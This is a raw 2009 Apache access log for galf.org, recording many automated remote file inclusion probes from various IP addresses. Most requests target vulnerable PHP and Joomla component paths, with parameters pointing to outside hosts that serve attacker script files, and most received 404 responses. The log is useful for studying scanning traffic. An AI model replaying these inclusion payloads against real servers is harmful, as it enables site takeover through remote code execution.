61.206.45.161 - - [25/Oct/2009:22:02:34 -0700] "GET /admincp.php?rootpath=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
61.206.45.161 - - [25/Oct/2009:22:02:53 -0700] "GET /admincp.php?rootpath=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
63.223.85.28 - - [25/Oct/2009:22:03:03 -0700] "GET /logs/access_090803.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
86.65.110.157 - - [25/Oct/2009:22:04:31 -0700] "GET /admincp.php?rootpath=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "galf.org"
86.65.110.157 - - [25/Oct/2009:22:04:48 -0700] "GET /admincp.php?rootpath=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
62.140.23.192 - - [25/Oct/2009:22:04:49 -0700] "GET /logs/access_091012.log/////skin/ggambo7002_board/comment_modify.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [25/Oct/2009:22:05:09 -0700] "GET /logs/access.log/////skin/ggambo7002_board/comment_modify.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
38.110.65.1 - - [25/Oct/2009:22:05:25 -0700] "GET /logs/access_090608.log//components/com_simpleboard/image_upload.php?sbp=http://www.tao-clinic.com/store/images/hewlett_packard/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
38.110.65.1 - - [25/Oct/2009:22:06:03 -0700] "GET /logs/access_090831.log//components/com_simpleboard/image_upload.php?sbp=http://www.tao-clinic.com/store/images/hewlett_packard/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [25/Oct/2009:22:06:09 -0700] "GET /logs/access_091012.log/////skin/ggambo7002_board/comment_modify.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [25/Oct/2009:22:06:35 -0700] "GET /logs/access.log/////skin/ggambo7002_board/comment_modify.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
70.38.52.2 - - [25/Oct/2009:22:07:47 -0700] "GET /logs/access_090608.log//components/com_simpleboard/image_upload.php?sbp=http://www.tao-clinic.com/store/images/hewlett_packard/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:22:08:37 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:22:08:37 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:22:08:37 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:22:08:37 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
70.38.52.2 - - [25/Oct/2009:22:08:38 -0700] "GET /logs/access_090831.log//components/com_simpleboard/image_upload.php?sbp=http://www.tao-clinic.com/store/images/hewlett_packard/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.55.209.188 - - [25/Oct/2009:22:08:55 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.209.188 - - [25/Oct/2009:22:08:56 -0700] "GET /labia/?M=A HTTP/1.1" 200 524 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
38.110.65.1 - - [25/Oct/2009:22:13:01 -0700] "GET /logs/access_090608.log//components/com_simpleboard/image_upload.php?sbp=http://www.tao-clinic.com/store/images/hewlett_packard/AinuLid1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.55.207.75 - - [25/Oct/2009:22:13:48 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.207.75 - - [25/Oct/2009:22:15:07 -0700] "GET /cendoc/ HTTP/1.1" 200 526 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
211.233.89.140 - - [25/Oct/2009:22:15:48 -0700] "GET /logs/access_090914.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.shinsungfa.com/bbs/licence_ads.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.233.89.140 - - [25/Oct/2009:22:15:48 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.shinsungfa.com/bbs/licence_ads.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.233.89.140 - - [25/Oct/2009:22:15:48 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.shinsungfa.com/bbs/licence_ads.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.233.89.140 - - [25/Oct/2009:22:16:02 -0700] "GET /logs/access_090622.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.shinsungfa.com/bbs/licence_ads.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
200.108.199.16 - - [25/Oct/2009:22:16:34 -0700] "GET /admincp.php?rootpath=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
174.143.3.188 - - [25/Oct/2009:22:19:02 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:22:19:02 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:22:19:02 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:22:19:02 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.galf.org"
64.6.232.171 - - [25/Oct/2009:22:19:20 -0700] "GET /logs/access_090914.log/index.php?body=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.galf.org"
64.6.232.171 - - [25/Oct/2009:22:19:20 -0700] "GET /index.php?body=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.galf.org"
64.6.232.171 - - [25/Oct/2009:22:19:20 -0700] "GET /logs/index.php?body=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.galf.org"
64.6.232.171 - - [25/Oct/2009:22:19:21 -0700] "GET /logs/access_090914.log/index.php?body=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.galf.org"
64.6.232.171 - - [25/Oct/2009:22:19:21 -0700] "GET /index.php?body=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.galf.org"
64.6.232.171 - - [25/Oct/2009:22:19:23 -0700] "GET /logs/access_090413.log/index.php?body=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.galf.org"
64.6.232.171 - - [25/Oct/2009:22:19:24 -0700] "GET /logs/index.php?body=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.galf.org"
64.6.232.171 - - [25/Oct/2009:22:19:32 -0700] "GET /logs/access_090413.log/index.php?body=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.galf.org"
91.121.3.184 - - [25/Oct/2009:22:20:26 -0700] "GET /modules/xfsection/modify.php?dir_module=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
91.121.3.184 - - [25/Oct/2009:22:20:26 -0700] "GET /modules/xfsection/modify.php?dir_module=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
91.121.3.184 - - [25/Oct/2009:22:20:30 -0700] "GET /modules/xfsection/modify.php?dir_module=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
91.121.3.184 - - [25/Oct/2009:22:20:44 -0700] "GET /modules/xfsection/modify.php?dir_module=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
91.121.3.184 - - [25/Oct/2009:22:20:44 -0700] "GET /modules/xfsection/modify.php?dir_module=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
91.121.3.184 - - [25/Oct/2009:22:20:44 -0700] "GET /modules/xfsection/modify.php?dir_module=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
61.206.45.161 - - [25/Oct/2009:22:21:36 -0700] "GET /logs/access_090921.log/admincp.php?rootpath=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.206.45.161 - - [25/Oct/2009:22:21:36 -0700] "GET /admincp.php?rootpath=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.206.45.161 - - [25/Oct/2009:22:21:37 -0700] "GET /logs/admincp.php?rootpath=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.206.45.161 - - [25/Oct/2009:22:21:55 -0700] "GET /modules/xfsection/modify.php?dir_module=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
86.65.110.157 - - [25/Oct/2009:22:22:12 -0700] "GET /modules/xfsection/modify.php?dir_module=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "galf.org"
61.206.45.161 - - [25/Oct/2009:22:22:13 -0700] "GET /modules/xfsection/modify.php?dir_module=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
86.65.110.157 - - [25/Oct/2009:22:22:33 -0700] "GET /modules/xfsection/modify.php?dir_module=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
211.233.89.140 - - [25/Oct/2009:22:23:08 -0700] "GET /logs/access_090803.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.shinsungfa.com/bbs/licence_ads.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.233.89.140 - - [25/Oct/2009:22:23:09 -0700] "GET /logs/access_090914.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.shinsungfa.com/bbs/licence_ads.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.121.3.184 - - [25/Oct/2009:22:24:38 -0700] "GET /logs/access_090921.log/admincp.php?rootpath=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
91.121.3.184 - - [25/Oct/2009:22:24:38 -0700] "GET /admincp.php?rootpath=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
91.121.3.184 - - [25/Oct/2009:22:24:38 -0700] "GET /logs/admincp.php?rootpath=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
91.121.3.184 - - [25/Oct/2009:22:24:39 -0700] "GET /logs/access_090921.log/admincp.php?rootpath=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
91.121.3.184 - - [25/Oct/2009:22:24:40 -0700] "GET /admincp.php?rootpath=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
91.121.3.184 - - [25/Oct/2009:22:24:40 -0700] "GET /logs/admincp.php?rootpath=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
91.121.3.184 - - [25/Oct/2009:22:24:42 -0700] "GET /logs/access_090921.log/admincp.php?rootpath=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
91.121.3.184 - - [25/Oct/2009:22:24:42 -0700] "GET /admincp.php?rootpath=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
91.121.3.184 - - [25/Oct/2009:22:24:42 -0700] "GET /logs/admincp.php?rootpath=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.11.145.8 - - [25/Oct/2009:22:26:37 -0700] "GET /logs/access_090316.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://family365.com/board//skin/ggaggo_pds/enda-id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.6.232.171 - - [25/Oct/2009:22:27:06 -0700] "GET /logs/access_091012.log/index.php?body=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.galf.org"
62.140.23.192 - - [25/Oct/2009:22:27:20 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
62.140.23.192 - - [25/Oct/2009:22:27:20 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
62.140.23.192 - - [25/Oct/2009:22:27:20 -0700] "GET /logs/access.log%20%20//modules/xfsection/modify.php?dir_module=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
62.140.23.192 - - [25/Oct/2009:22:27:21 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
62.140.23.192 - - [25/Oct/2009:22:27:21 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
62.140.23.192 - - [25/Oct/2009:22:27:21 -0700] "GET /logs/access.log%20%20//modules/xfsection/modify.php?dir_module=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
61.206.45.161 - - [25/Oct/2009:22:27:31 -0700] "GET /logs/access.log/admincp.php?rootpath=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
61.206.45.161 - - [25/Oct/2009:22:27:32 -0700] "GET /admincp.php?rootpath=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
61.206.45.161 - - [25/Oct/2009:22:27:32 -0700] "GET /logs/admincp.php?rootpath=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
174.143.3.188 - - [25/Oct/2009:22:28:47 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:22:28:47 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:22:28:47 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:22:28:47 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.galf.org"
213.171.225.234 - - [25/Oct/2009:22:30:09 -0700] "GET /logs/access_090914.log%20%20///?_zb_path=http://www.gracefellowshiptv.com//bbs/data/movies/idxx.txt?%20? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.171.225.234 - - [25/Oct/2009:22:30:09 -0700] "GET /logs/access_090309.log%20%20///?_zb_path=http://www.gracefellowshiptv.com//bbs/data/movies/idxx.txt?%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.171.225.234 - - [25/Oct/2009:22:30:10 -0700] "GET //?_zb_path=http://www.gracefellowshiptv.com//bbs/data/movies/idxx.txt?%20? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
213.171.225.234 - - [25/Oct/2009:22:30:10 -0700] "GET /logs///?_zb_path=http://www.gracefellowshiptv.com//bbs/data/movies/idxx.txt?%20? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [25/Oct/2009:22:30:14 -0700] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
62.140.23.192 - - [25/Oct/2009:22:30:14 -0700] "GET /logs/access.log%20%20/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
62.140.23.192 - - [25/Oct/2009:22:30:14 -0700] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
62.140.23.192 - - [25/Oct/2009:22:30:34 -0700] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [25/Oct/2009:22:30:34 -0700] "GET /logs/access_090928.log%20%20/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [25/Oct/2009:22:30:35 -0700] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.121.3.184 - - [25/Oct/2009:22:31:18 -0700] "GET /logs/access.log/admincp.php?rootpath=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
91.121.3.184 - - [25/Oct/2009:22:31:18 -0700] "GET /admincp.php?rootpath=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
91.121.3.184 - - [25/Oct/2009:22:31:18 -0700] "GET /logs/admincp.php?rootpath=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
91.121.3.184 - - [25/Oct/2009:22:31:20 -0700] "GET /logs/access.log/admincp.php?rootpath=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
91.121.3.184 - - [25/Oct/2009:22:31:20 -0700] "GET /admincp.php?rootpath=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
91.121.3.184 - - [25/Oct/2009:22:31:20 -0700] "GET /logs/admincp.php?rootpath=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
91.121.3.184 - - [25/Oct/2009:22:31:49 -0700] "GET /logs/access.log/admincp.php?rootpath=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
91.121.3.184 - - [25/Oct/2009:22:31:49 -0700] "GET /admincp.php?rootpath=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
91.121.3.184 - - [25/Oct/2009:22:31:49 -0700] "GET /logs/admincp.php?rootpath=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
91.121.3.184 - - [25/Oct/2009:22:31:57 -0700] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
91.121.3.184 - - [25/Oct/2009:22:31:57 -0700] "GET /modules/xfsection/modify.php?dir_module=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
91.121.3.184 - - [25/Oct/2009:22:31:57 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
91.121.3.184 - - [25/Oct/2009:22:31:57 -0700] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
91.121.3.184 - - [25/Oct/2009:22:31:57 -0700] "GET /modules/xfsection/modify.php?dir_module=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
91.121.3.184 - - [25/Oct/2009:22:31:57 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
91.121.3.184 - - [25/Oct/2009:22:31:58 -0700] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
91.121.3.184 - - [25/Oct/2009:22:31:58 -0700] "GET /modules/xfsection/modify.php?dir_module=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
91.121.3.184 - - [25/Oct/2009:22:31:59 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
86.65.110.157 - - [25/Oct/2009:22:34:20 -0700] "GET /logs/access_090921.log/admincp.php?rootpath=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
86.65.110.157 - - [25/Oct/2009:22:34:20 -0700] "GET /admincp.php?rootpath=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
86.65.110.157 - - [25/Oct/2009:22:34:20 -0700] "GET /logs/admincp.php?rootpath=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
91.121.3.184 - - [25/Oct/2009:22:34:44 -0700] "GET /logs/access_091012.log//modules/xfsection/modify.php?dir_module=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
91.121.3.184 - - [25/Oct/2009:22:34:44 -0700] "GET /logs/access_091012.log//modules/xfsection/modify.php?dir_module=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
91.121.3.184 - - [25/Oct/2009:22:34:44 -0700] "GET /logs/access_091012.log//modules/xfsection/modify.php?dir_module=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
91.121.3.184 - - [25/Oct/2009:22:34:44 -0700] "GET /modules/xfsection/modify.php?dir_module=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
91.121.3.184 - - [25/Oct/2009:22:34:44 -0700] "GET /modules/xfsection/modify.php?dir_module=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
91.121.3.184 - - [25/Oct/2009:22:34:44 -0700] "GET /modules/xfsection/modify.php?dir_module=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
91.121.3.184 - - [25/Oct/2009:22:34:44 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
91.121.3.184 - - [25/Oct/2009:22:34:44 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
